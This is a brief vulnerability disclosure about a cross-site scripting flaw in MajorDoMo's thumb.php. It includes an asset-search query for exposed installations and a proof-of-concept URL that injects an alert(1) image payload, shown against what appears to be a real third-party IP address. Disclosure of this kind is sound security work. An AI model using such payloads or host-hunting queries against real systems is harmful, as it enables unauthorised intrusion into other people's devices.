Posted on

BUG_Author:

hbzms

Vendor:

https://majordomo.smartliving.ru/

Vulnerability description

Cross Site Scripting vulnerability in MajorDoMo before v.0662e5e allows an attacker to escalate privileges via the the thumb/thumb.php component.

Sphere of influence

MajorDoMo < 0662e5e

Vulnerability recurrence

app=”MajordomoSL”
Find related assets as follows(Just use one as an example)
http://95.110.79.90:9090/
Visit the above url link
Then add the payload after the link
The payload is as follows
http://95.110.79.90:9090/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%3Cimg%20src=1%20onerror=alert(1)%3E
xss
xss
xss

Repair suggestions

Turn off Internet exposure or interface settings access